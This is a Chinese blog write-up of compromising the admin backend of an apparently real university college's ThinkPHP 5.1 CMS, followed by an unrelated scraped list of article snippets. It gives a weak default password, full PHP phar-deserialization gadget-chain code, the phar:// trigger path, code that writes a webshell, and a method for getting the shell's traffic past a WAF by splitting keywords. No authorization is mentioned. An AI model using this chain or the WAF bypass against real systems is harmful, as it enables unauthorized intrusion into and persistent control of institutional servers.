末 初
末 初

某某大学某学院后台Phar反序列化GetShell

觉得这个洞还算有点意思,可以记录一下

首先在另一个二级学院进行目录扫描时发现源码www.rar,并且通过一些页面测试推测这两个二级学院应该是使用了同一套CMS

分析源码,发现使用的是ThinkPHP 5.1.34 LTS框架

某某大学某学院后台Phar反序列化GetShell_第1张图片

通过APP、Public得到后台访问路径/bhadmin

某某大学某学院后台Phar反序列化GetShell_第2张图片

某某大学某学院后台Phar反序列化GetShell_第3张图片

后台登陆存在弱口令(弱口令真是永远滴神):admin/123456

分析源码,发现在System控制器下有一个showlog()方法

某某大学某学院后台Phar反序列化GetShell_第4张图片

	public function showlog()
	{
		$path    = input('post.path','');
		if ($path == '') return json(0);
        if (!file_exists($path)) return json('文件不存在');
        $content = file_get_contents($path,false);
        return json($content);
    }

$path接收的是post传参,参数名是path,如果$path为空,返回为0,否则会检测该文件是否存在,如果存在则file_get_content()读取成json格式返回。input()方法功能如下:

if (!function_exists('input')) {
    /**
     * 获取输入数据 支持默认值和过滤
     * @param string    $key 获取的变量名
     * @param mixed     $default 默认值
     * @param string    $filter 过滤方法
     * @return mixed
     */
    function input($key = '', $default = null, $filter = '')
    {
        if (0 === strpos($key, '?')) {
            $key = substr($key, 1);
            $has = true;
        }

        if ($pos = strpos($key, '.')) {
            // 指定参数来源
            $method = substr($key, 0, $pos);
            if (in_array($method, ['get', 'post', 'put', 'patch', 'delete', 'route', 'param', 'request', 'session', 'cookie', 'server', 'env', 'path', 'file'])) {
                $key = substr($key, $pos + 1);
            } else {
                $method = 'param';
            }
        } else {
            // 默认为自动判断
            $method = 'param';
        }

        if (isset($has)) {
            return request()->has($key, $method, $default);
        } else {
            return request()->$method($key, $default, $filter);
        }
    }
}

showlog()方法参数可控,并且$path传入file_exists()file_get_contents(),首先这里是一个任意文件读取,但是重点不是这个哈,并且ThinkPHP 5.1.x在网上有很多公开的反序列化利用链。众所周知。Phar在压缩文件包时,会以序列化的形式存储用户自定义的meta-data,配合phar://协议就能在某些函数(一般是文件操作函数)等参数可控的情况下实现自动反序列化操作。

对Phar反序列化有不理解的可以参考我的这篇文章:由浅入深理解PHP反序列化漏洞

那么我们如果在后台传入一个构造好的phar文件,然后在$path的位置使用Phar://协议访问改文件,即可触发phar反序列化showlog方法的访问路由:/bhadmin/system/showlog

某某大学某学院后台Phar反序列化GetShell_第5张图片

然后需要找到一个上传点,并且能获取上传文件的绝对路径。

某某大学某学院后台Phar反序列化GetShell_第6张图片

添加资料这里有个编辑器,可以上传图片预览,可获得绝对路径

某某大学某学院后台Phar反序列化GetShell_第7张图片

综上所述即可构造Phar反序列化GetShell,直接用网上公开的链子


namespace think{
    abstract class Model{
        private $withAttr = [];
        private $data = [];
        public function __construct($function,$parameter){
            $this->data['smi1e'] = $parameter;
            $this->withAttr['smi1e'] = $function;
        }
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model
    {}
}

namespace think\process\pipes {
    use Phar;
    use think\model\Pivot;
    class Windows{
        private $files = [];
        public function __construct($function, $parameter){
            $this->files = [new Pivot($function, $parameter)];
        }
    }


    $function = 'assert';
    $parameter = 'phpinfo()';
    $a = new Windows($function, $parameter);
    $phar = new Phar('test.phar');
    $phar->stopBuffering();
    $phar->setStub(file_get_contents("pic.jpg") . '');
    $phar->addFromString('test.txt', 'test');
    $phar->setMetadata($a);
    $phar->stopBuffering();
}

同目录下随便放一张名为pic.jpg的图片,运行该文件,将生成的test.phar修改后缀为test.jpg然后上传

某某大学某学院后台Phar反序列化GetShell_第8张图片

回到showlog()方法处,直接触发:触发:path=phar://public/kindedit/attached/image/20230531/64765e58e79df.jpg

某某大学某学院后台Phar反序列化GetShell_第9张图片
构造写入Shell


namespace think{
    abstract class Model{
        private $withAttr = [];
        private $data = [];
        public function __construct(){
            $this->data['smi1e'] = 'D:\\xxx\\xxx\\xxx\\public\\kindedit\\attached\\image\\20230531\\d72a3676c4413.php';
            $this->data['jelly'] = '';
            $this->withAttr['smi1e'] = 'file_put_contents';
        }
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model
    {}
}

namespace think\process\pipes {
    use Phar;
    use think\model\Pivot;
    class Windows{
        private $files = [];
        public function __construct($function, $parameter){
            $this->files = [new Pivot($function, $parameter)];
        }
    }


    $function = 'assert';
    $parameter = 'phpinfo()';
    $a = new Windows($function,$parameter);
    $phar = new Phar('test.phar');
    $phar->stopBuffering();
    $phar->setStub(file_get_contents("pic.jpg") . '');
    $phar->addFromString('test.txt', 'test');
    $phar->setMetadata($a);
    $phar->stopBuffering();
}

某某大学某学院后台Phar反序列化GetShell_第10张图片
成功写入shell,但是蚁剑连接还是报错,猜测有waf

某某大学某学院后台Phar反序列化GetShell_第11张图片
把蚁剑流量代理到Burp

某某大学某学院后台Phar反序列化GetShell_第12张图片

测试发现确实是有WAF

某某大学某学院后台Phar反序列化GetShell_第13张图片

但是经过多次测试发现这个waf比较友好,过滤了@base64_decode关键字,可以绕过,base64_decode可以使用拼接绕过,@直接可以去掉,不影响功能,直接使用Burp的匹配/替换功能

某某大学某学院后台Phar反序列化GetShell_第14张图片
绕过waf之后即可成功连接shell

某某大学某学院后台Phar反序列化GetShell_第15张图片
某某大学某学院后台Phar反序列化GetShell_第16张图片

如果觉得这样代理到burp做替换不太方便,也可以上传冰蝎的AES加密shell,就不用绕过waf

某某大学某学院后台Phar反序列化GetShell_第17张图片

你可能感兴趣的:(漏洞挖掘,Phar反序列化,漏洞挖掘)

  • python docker 镜像过大_【转】六种减小Docker镜像大小的方法 weixin_39627408 pythondocker镜像过大
    转自P牛,vulnhub作者,擅长代码审计和漏洞挖掘,今天看到他的公众号发了一篇这个,正好平时自己的工作也有需求,整理记录如下。=========================================我从2017年做Vulhub开始,一直在和一个麻烦的问题做斗争:在编写Dockerfile的时候,如何减小dockerbuild生成的镜像大小?这篇文章就给大家总结一下我自己使用过的六种减小
  • Asp .Net Core 系列:Asp .Net Core 集成 Newtonsoft.Json Code技术分享 .netcorejson
    简介Newtonsoft.Json是一个在.NET环境下开源的JSON格式序列化和反序列化的类库。它可以将.NET对象转换为JSON格式的字符串,也可以将JSON格式的字符串转换为.NET对象。这个类库在.NET开发中被广泛使用,因为它功能强大、易于使用,并且有良好的性能。使用Newtonsoft.Json,你可以方便地进行以下操作:序列化:将.NET对象转换为JSON字符串。这通常用于将数据发送
  • 安卓Java面试题 71- 80 ️ 邪神 Android面试题安卓面试题androidjava
    71.简述Andorid中的Parcel存储机制?Android中的Parcel机制实现了Bundle传递对象使用Bundle传递对象,首先要将其序列化,但是,在Android中要使用这种传递对象的方式需要用到AndroidParcel机制,即,Android实现的轻量级的高效的对象序列化和反序列化机制。JAVA中的Serialize机制,译成串行化、序列化……,其作用是能将数据对象存入字节流当中
  • 单例模式之枚举 HeroNet2010 Java单例模式java
    众所周知,在java中有多种方式创建单例:饿汉式,懒汉式,双重检测懒汉式,静态内部类等,这些单列模式各有缺点:有的类加载时就初始化,浪费内存有的不保证多线程安全有的因为加了synchronized同步锁导致并发效率较低以上的单例模式都能通过反射,反序列化,克隆等方式被破坏publicclassSingletonTestDoubleCheckimplementsCloneable,Serializa
  • 【python】 用来将对象持久化的 pickle 模块 咖 啡加剁椒 软件测试pythonwindows开发语言软件测试功能测试自动化测试程序人生
    pickle模块可以对一个Python对象的二进制进行序列化和反序列化。说白了,就是它能够实现任意对象与二进制直接的相互转化,也可以实现对象与文本之间的相互转化。比如,我程序里有一个python对象,我想把它存到磁盘里,于是我用pickle把他转到一个文本里。当后面我想使用的时候,读取出来时候依然是一个python对象。一、pickle模块下的方法pickle模块提供了以下4种方法:dump():
  • 解锁Golang数据编解码能力:encoding库完全解析 walkskyer golang标准库golang服务器网络
    解锁Golang数据编解码能力:encoding库完全解析简介为何重视`encoding`库`encoding`库的实战开发重要性JSON处理基本使用序列化与反序列化处理复杂JSON结构自定义序列化行为错误处理和性能优化建议XML处理基本概念和使用方法序列化与反序列化使用标签控制XML节点的名称、属性和命名空间处理复杂和嵌套的XML结构性能优化和错误处理CSV文件处理`encoding/csv`库
  • JAVA面试题28 CrazyMax_zh java开发语言
    面试题:Java中的静态变量和实例变量有何区别?它们存储在内存的哪个部分?答案:静态变量属于类,实例变量属于对象。静态变量在内存中只有一份拷贝,存储在方法区(JVM内存中的一部分),而实例变量每个对象都有自己的值,存储在堆内存中。面试题:Java中什么是序列化(Serialization)?如何实现序列化和反序列化?答案:序列化是将对象转换为字节序列以便存储或传输的过程。实现序列化需要让类实现Se
  • 关于TypeReference的使用 韩_师兄 技能点javajackson
    关于TypeReference的使用在项目中,有遇到TypeReference的使用,其主要在字符串转对象过程中,对于序列化和反序列化中也有效果,将字符串转换成自定义对象.1说明以常见为例,在com.alibaba.fastjson包下面的TypeReference类,是指Type的Reference,表示某类型的一个指向或者引用.protectedTypeReference(){//当前类父类的
  • Guava 工具类之Cache的使用 本地缓存组件 ʚ小华 guava缓存
    一.guavacache介绍1.介绍guavacache是Googleguava中提供的一款轻量级的本地缓存组件,其特点是简单、轻便、完善、扩展性强,内存管理机制也相对完善。2.使用缓存的优点1.减少了网络调用的开销2.减少了数据请求的序列化和反序列化二.guavacache分类guavacache提供了2种类型:Cache:创建1个缓存.LoadingCache:它能够通过CacheLoader
  • php session序列化,深入解析PHP中SESSION反序列化机制 罅天 phpsession序列化
    简介在php.ini中存在三项配置项:session.save_path=""--设置session的存储路径session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)session.auto_startboolen--指定会话模块是否在请求开始时启动一个会话,默认为0不启动session.serialize_ha
  • mysql 反序列化函数_参考手册PHP 序列化和反序列化的方法函数. - PHP教程 Alin John mysql反序列化函数
    PHP序列化和反序列化的方法函数我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,反序列化输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的ph
  • php反序列化语句实例,PHP反序列化的一些例子 李念橙橙 php反序列化语句实例
    之前web一直被PHP反序列化的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般反序列化能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(),sleep(),wakeup(),toString().首先我们以construct
  • php反序列化需要几个对象,PHP反序列化详解 丁天天 php反序列化需要几个对象
    PHP反序列化漏洞(PHP对象注入漏洞)PHP中有两个函数serialize()[用于序列化]和unserialize()[用于反序列化]这里一个使用了serialize函数序列化数值的例子classchybeta{var$test='123';}$class1=newchybeta;$class1_ser=serialize($class1);print_r($class1_ser);?>该例子
  • [PHP 反序列化参考手册] cl1mb3r phpandroid开发语言
    一、简单的反序列化题目1.P1task.phpname==='ctf'){echogetenv('FLAG');}}}unserialize($_GET['n']);exp.phpadmin="user";$this->passwd="123456";}publicfunction__destruct(){if($this->admin==="admin"&&$this->passwd==="ct
  • Winform中设置隐藏窗体且不在任务栏中显示 霸道流氓气质 C#winform
    场景Winform中设置程序开机自启动(修改注册表和配置自启动快捷方式):Winform中设置程序开机自启动(修改注册表和配置自启动快捷方式)_winfrom如何设置开启自动启动-CSDN博客通过以上方式设置winform程序开机自启动之后,需要启动后判断配置文件如果不为空则窗体隐藏,任务后台进行。Winform中实现保存配置到文件/项目启动时从文件中读取配置(序列化与反序列化对象):Winfor
  • 使用Jackson库进行JSON序列化和反序列化 才艺のblog jsonpython开发语言
    一、序言在现代Web开发中,JSON(JavaScriptObjectNotation)成为了一种广泛使用的数据格式,用于前后端数据传输和存储。Java是一种面向对象编程语言,而JSON是一种键值对格式的数据,因此在Java中,需要将Java对象转换为JSON字符串,或者将JSON字符串转换为Java对象。这个过程就是JSON的序列化和反序列化。对于Java中的JSON序列化和反序列化,有很多开源
  • [计算机网络]---序列化和反序列化 小蜗牛~向前冲 网络计算机网络
    前言作者:小蜗牛向前冲名言:我可以接受失败,但我不能接受放弃如果觉的博主的文章还不错的话,还请点赞,收藏,关注支持博主。如果发现有问题的地方欢迎❀大家在评论区指正目录一、再谈协议二、序列化和反序化1、网络版本计算器的场景搭建2、服务器构建3、客户端构建4、序列化和反序列化4.1自定义序列化和反序列化4.2json实现序列化和反序列化5、测试本期学习:重点理解序化和反序列化一、再谈协议在前面博客谈网
  • [H二叉树] lc297. 二叉树的序列化与反序列化(二叉树+前序遍历+中序遍历+面试经典) Ypuyu LeetCode
    文章目录1.题目来源2.题目解析1.题目来源链接:297.二叉树的序列化与反序列化相同:[剑指-Offer]37.序列化二叉树(层序遍历、前序遍历、递归、特殊情况)参考题解:BFS和DFS两种方式解决2.题目解析之前写过这题,但是当时还没有学算法,写的很垃圾。仅给前序遍历是无法建树的,必须有中序的加入才可以。可以证明,中序遍历+任一其它序遍历都可以唯一构建一颗二叉树。本题采用序列化方式构建二叉树,
  • ctf刷题 ctfshow【网鼎杯】 路向阳_ CTF学习网络安全
    Php-3、java-3、目录一、网鼎杯-青龙组-web--AreUserialZ1、源码见下:serialzcopy3、绕过语法详解:4、尝试绕过:二、php特性三、php反序列化漏洞四、Buuctf一、网鼎杯-青龙组-web--AreUserialZBuuctf1、源码见下:serialzcopyPhp反序列化:思路:先阅读源码,在分析思路//大致思路:新建一个对象filenameflag.p
  • ctfshow刷题(Java反序列化) V3g3t4ble java开发语言
    CTFshowJava反序列化web846urldns链importjava.io.ByteArrayOutputStream;importjava.io.IOException;importjava.io.ObjectOutput;importjava.io.ObjectOutputStream;importjava.lang.reflect.Field;importjava.net.URL;i
  • 035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载 wusuowei2986 安全java-eepython
    035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载#知识点:1、JavaEE-反序列化-解释&使用&安全2、JavaEE-安全-利用链&直接重写方法3、JavaEE-安全-利用链&外部重写方法演示案例:➢Java-原生使用-序列化&反序列化➢Java-安全问题-重写方法&触发方法➢Java-安全问题-可控其他类重写方法#Java序列化&反序列化-概念1、序列化与反
  • Caused by: com.alibaba.fastjson.JSONException: autoType is not support 风流倜傥唐伯虎
    那是因为你把数据存进redis中的时候,使用了GenericFastJsonRedisSerializer来序列化和反序列化redis的value值解决办法:1.返回对象必须要有个无参构造方法,否则报错2.可以使用JdkSerializationRedisSerializer,只不过JdkSerializationRedisSerializer在redis中保存的是二进制,而GenericFast
  • Flask——基本前后端数据传输示例 Irving.Gao pythonWebflaskpython后端
    文章目录步骤1:使用`requests`发送JSON数据步骤2:使用Flask接收并反序列化JSON数据要实现您的需求,我们可以通过两个步骤来完成:首先,使用Python的requests库发送JSON格式的数据;其次,使用Flask框架在服务器端接收这些数据并将其反序列化为字典格式。步骤1:使用requests发送JSON数据要发送JSON数据,您可以使用requests库的post方法。首先确
  • 深入浅出理解数据的序列化和反序列化 gordon1986 后端序列化protobufThrift
    一般来说,数据的处理有两种类型。一种是在内存中,比如我们常见的结构体,list,数组等等。而另外一种就是把数据写到文件中或者在网络中进行传输,这个时候的数据传输说白了就是比特流,那么接受方如何解析这些接收到的比特流呢?这个时候就需要对数据进行序列化,把相应的数据转化成可以自解释比特流。然后接收方就可以通过反序列化的方法把这些比特流再转化成相应的结构体等等类型。各种语言自带的格式很多语言都有自带的序
  • 面试系列 - 序列化和反序列化详解 境里婆娑 面试职场和发展
    Java序列化是一种将对象转换为字节流的过程,可以将对象的状态保存到磁盘文件或通过网络传输。反序列化则是将字节流重新转换为对象的过程。Java提供了一个强大的序列化框架,允许你在对象的持久化和网络通信中使用它。一、Java序列化的基本原理Java序列化的基本原理是将一个Java对象转换为一个字节序列,以便将其保存到磁盘上的文件或通过网络发送到其他地方。这个字节序列可以随后被反序列化为原始对象。Ja
  • php伪协议之phar 郑居中3.0 web漏洞php开发语言php伪协议phar
    一.phar协议用于将多个PHP文件、类、库、资源(如图像、样式表)等打包成一个单独的文件。这个归档文件可以像其他PHP文件一样被包含(include)或执行。PHAR归档提供了一种方便的方式来分发和安装PHP应用程序和库,尤其是当它们包含许多文件和目录时1.格式将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)phar://s
  • Go json Marshal & UnMarshal 的一点小 trick yeshan333 golangjson开发语言
    在编写WebService等涉及数据序列化和反序列化的场景,对于JSON类型的数据,在Go中我们经常会使用到encoding/jsonPackage。最近微有所感,小水一篇omitemptyJSON数据的UnMarshal我们经常会配合StructTags使用,让Struct的Filed与JSON数据的指定property绑定。如果要序列化为GoStruct的JSON数据对应的Fields相关的J
  • 449. 序列化和反序列化二叉搜索树 luckycoding 算法数据结构leetcode
    文章目录题意思路代码题意题目链接一棵树如果编码成string,然后解码回来。思路使用BFS,按节点保存起来,使用-1标识空指针;没有重复节点,直接模拟就好了;虽然可以使用先序遍历+中序遍历,还原树,不过这么写简单。代码/***Definitionforabinarytreenode.*structTreeNode{*intval;*TreeNode*left;*TreeNode*right;*Tr
  • vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645) 余生有个小酒馆 vulhub漏洞复现apachelog4j
    ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。ApacheLog4j2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。java-jarysoserial-master-v0.0.5-gb617b7b-16.jarCommonsCollect
  • 数据转换成json格式 wushijun5200 开发语言
    //Listxm=GetmoreSpinfoku(id);//returnJsonConvert.SerializeObject(xm);//将数据转换成json格式returnJsonConvert.SerializeObject(ds);//将数据转换成json格式spcgjlZDspselld=JsonConvert.DeserializeObject(xm1);//商品子项目反序列化//s
  • 对于规范和实现,你会混淆吗? yangshangchuan HotSpot
    昨晚和朋友聊天,喝了点咖啡,由于我经常喝茶,很长时间没喝咖啡了,所以失眠了,于是起床读JVM规范,读完后在朋友圈发了一条信息: JVM Run-Time Data Areas:The Java Virtual Machine defines various run-time data areas that are used during execution of a program. So
  • android 网络 百合不是茶 网络
    android的网络编程和java的一样没什么好分析的都是一些死的照着写就可以了,所以记录下来  方便查找   ,  服务器使用的是TomCat   服务器代码;  servlet的使用需要在xml中注册 package servlet; import java.io.IOException; import java.util.Arr
  • [读书笔记]读法拉第传 comsci 读书笔记
          1831年的时候,一年可以赚到1000英镑的人..应该很少的...       要成为一个科学家,没有足够的资金支持,很多实验都无法完成       但是当钱赚够了以后....就不能够一直在商业和市场中徘徊......
  • 随机数的产生 沐刃青蛟 随机数
    c++中阐述随机数的方法有两种:   一是产生假随机数(不管操作多少次,所产生的数都不会改变)          这类随机数是使用了默认的种子值产生的,所以每次都是一样的。   //默认种子 for (int i = 0; i < 5; i++) { cout<<
  • PHP检测函数所在的文件名 IT独行者 PHP函数
    很简单的功能,用到PHP中的反射机制,具体使用的是ReflectionFunction类,可以获取指定函数所在PHP脚本中的具体位置。 创建引用脚本。 代码:   [php]   view plain copy // Filename: functions.php    <?php&nbs
  • 银行各系统功能简介 文强chu 金融
    银行各系统功能简介   业务系统 核心业务系统 业务功能包括:总账管理、卡系统管理、客户信息管理、额度控管、存款、贷款、资金业务、国际结算、支付结算、对外接口等 清分清算系统 以清算日期为准,将账务类交易、非账务类交易的手续费、代理费、网络服务费等相关费用,按费用类型计算应收、应付金额,经过清算人员确认后上送核心系统完成结算的过程 国际结算系
  • Python学习1(pip django 安装以及第一个project) 小桔子 pythondjangopip
        最近开始学习python,要安装个pip的工具。听说这个工具很强大,安装了它,在安装第三方工具的话so easy!然后也下载了,按照别人给的教程开始安装,奶奶的怎么也安装不上! 第一步:官方下载pip-1.5.6.tar.gz, https://pypi.python.org/pypi/pip easy! 第二部:解压这个压缩文件,会看到一个setup.p
  • php 数组 aichenglong PHP排序数组循环多维数组
    1 php中的创建数组 $product = array('tires','oil','spark');//array()实际上是语言结构而不  是函数 2 如果需要创建一个升序的排列的数字保存在一个数组中,可以使用range()函数来自动创建数组 $numbers=range(1,10)//1 2 3 4 5 6 7 8 9 10 $numbers=range(1,10,
  • 安装python2.7 AILIKES python
    安装python2.7 1、下载可从 http://www.python.org/进行下载#wget https://www.python.org/ftp/python/2.7.10/Python-2.7.10.tgz 2、复制解压 #mkdir -p /opt/usr/python #cp  /opt/soft/Python-2
  • java异常的处理探讨 百合不是茶 JAVA异常
    //java异常  /* 1,了解java 中的异常处理机制,有三种操作 a,声明异常  b,抛出异常  c,捕获异常 2,学会使用try-catch-finally来处理异常 3,学会如何声明异常和抛出异常 4,学会创建自己的异常   */   //2,学会使用try-catch-finally来处理异常  
  • getElementsByName实例 bijian1013 element
    实例1: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/x
  • 探索JUnit4扩展:Runner bijian1013 java单元测试JUnit
            参加敏捷培训时,教练提到Junit4的Runner和Rule,于是特上网查一下,发现很多都讲的太理论,或者是举的例子实在是太牵强。多搜索了几下,搜索到两篇我觉得写的非常好的文章。         文章地址:http://www.blogjava.net/jiangshachina/archive/20
  • [MongoDB学习笔记二]MongoDB副本集 bit1129 mongodb
    1. 副本集的特性   1)一台主服务器(Primary),多台从服务器(Secondary)   2)Primary挂了之后,从服务器自动完成从它们之中选举一台服务器作为主服务器,继续工作,这就解决了单点故障,因此,在这种情况下,MongoDB集群能够继续工作   3)挂了的主服务器恢复到集群中只能以Secondary服务器的角色加入进来   2
  • 【Spark八十一】Hive in the spark assembly bit1129 assembly
    Spark SQL supports most commonly used features of HiveQL. However, different HiveQL statements are executed in different manners: 1. DDL statements (e.g. CREATE TABLE, DROP TABLE, etc.)
  • Nginx问题定位之监控进程异常退出 ronin47
    nginx在运行过程中是否稳定,是否有异常退出过?这里总结几项平时会用到的小技巧。 1. 在error.log中查看是否有signal项,如果有,看看signal是多少。 比如,这是一个异常退出的情况: $grep signal error.log 2012/12/24 16:39:56 [alert] 13661#0: worker process 13666 exited on s
  • No grammar constraints (DTD or XML schema).....两种解决方法 byalias xml
    方法一:常用方法   关闭XML验证 工具栏:windows => preferences => xml => xml files => validation => Indicate when no grammar is specified:选择Ignore即可。 方法二:(个人推荐) 添加 内容如下 <?xml version=
  • Netty源码学习-DefaultChannelPipeline bylijinnan netty
    package com.ljn.channel; /** * ChannelPipeline采用的是Intercepting Filter 模式 * 但由于用到两个双向链表和内部类,这个模式看起来不是那么明显,需要仔细查看调用过程才发现 * * 下面对ChannelPipeline作一个模拟,只模拟关键代码: */ public class Pipeline {
  • MYSQL数据库常用备份及恢复语句 chicony mysql
    备份MySQL数据库的命令,可以加选不同的参数选项来实现不同格式的要求。 mysqldump -h主机 -u用户名 -p密码 数据库名 > 文件 备份MySQL数据库为带删除表的格式,能够让该备份覆盖已有数据库而不需要手动删除原有数据库。 mysqldump -–add-drop-table -uusername -ppassword databasename > ba
  • 小白谈谈云计算--基于Google三大论文 CrazyMizzz Google云计算GFS
        之前在没有接触到云计算之前,只是对云计算有一点点模糊的概念,觉得这是一个很高大上的东西,似乎离我们大一的还很远。后来有机会上了一节云计算的普及课程吧,并且在之前的一周里拜读了谷歌三大论文。不敢说理解,至少囫囵吞枣啃下了一大堆看不明白的理论。现在就简单聊聊我对于云计算的了解。     我先说说GFS   &n
  • hadoop 平衡空间设置方法 daizj hadoopbalancer
    在hdfs-site.xml中增加设置balance的带宽,默认只有1M: <property>   <name>dfs.balance.bandwidthPerSec</name>     <value>10485760</value>     <description&g
  • Eclipse程序员要掌握的常用快捷键 dcj3sjt126com 编程
      判断一个人的编程水平,就看他用键盘多,还是鼠标多。用键盘一是为了输入代码(当然了,也包括注释),再有就是熟练使用快捷键。 曾有人在豆瓣评 《卓有成效的程序员》:“人有多大懒,才有多大闲”。之前我整理了一个 程序员图书列表,目的也就是通过读书,让程序员变懒。  程序员作为特殊的群体,有的人可以这么懒,懒到事情都交给机器去做,而有的人又可以那么勤奋,每天都孜孜不倦得
  • Android学习之路 dcj3sjt126com Android学习
    转自:http://blog.csdn.net/ryantang03/article/details/6901459 以前有J2EE基础,接触JAVA也有两三年的时间了,上手Android并不困难,思维上稍微转变一下就可以很快适应。以前做的都是WEB项目,现今体验移动终端项目,让我越来越觉得移动互联网应用是未来的主宰。 下面说说我学习Android的感受,我学Android首先是看MARS的视
  • java 遍历Map的四种方法 eksliang javaHashMapjava 遍历Map的四种方法
    转载请出自出处: http://eksliang.iteye.com/blog/2059996 package com.ickes; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Map.Entry; /** * 遍历Map的四种方式
  • 【精典】数据库相关相关 gengzg 数据库
    package C3P0; import java.sql.Connection; import java.sql.SQLException; import java.beans.PropertyVetoException; import com.mchange.v2.c3p0.ComboPooledDataSource; public class DBPool{
  • 自动补全 huyana_town 自动补全
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml&quo
  • jquery在线预览PDF文件,打开PDF文件 天梯梦 jquery
    最主要的是使用到了一个jquery的插件jquery.media.js,使用这个插件就很容易实现了。   核心代码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.
  • ViewPager刷新单个页面的方法 lovelease androidviewpagertag刷新
      使用ViewPager做滑动切换图片的效果时,如果图片是从网络下载的,那么再子线程中下载完图片时我们会使用handler通知UI线程,然后UI线程就可以调用mViewPager.getAdapter().notifyDataSetChanged()进行页面的刷新,但是viewpager不同于listview,你会发现单纯的调用notifyDataSetChanged()并不能刷新页面
  • 利用按位取反(~)从复合枚举值里清除枚举值 草料场 enum
    以 C# 中的 System.Drawing.FontStyle 为例。   如果需要同时有多种效果, 如:“粗体”和“下划线”的效果,可以用按位或(|) FontStyle style = FontStyle.Bold | FontStyle.Underline;   如果需要去除 style 里的某一种效果,
  • Linux系统新手学习的11点建议 刘星宇 编程工作linux脚本
      随着Linux应用的扩展许多朋友开始接触Linux,根据学习Windwos的经验往往有一些茫然的感觉:不知从何处开始学起。这里介绍学习Linux的一些建议。   一、从基础开始:常常有些朋友在Linux论坛问一些问题,不过,其中大多数的问题都是很基础的。例如:为什么我使用一个命令的时候,系统告诉我找不到该目录,我要如何限制使用者的权限等问题,这些问题其实都不是很难的,只要了解了 Linu
  • hibernate dao层应用之HibernateDaoSupport二次封装 wangzhezichuan DAOHibernate
    /** * <p>方法描述:sql语句查询 返回List<Class> </p> * <p>方法备注: Class 只能是自定义类 </p> * @param calzz * @param sql * @return * <p>创建人:王川</p> * <p>创建时间:Jul
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他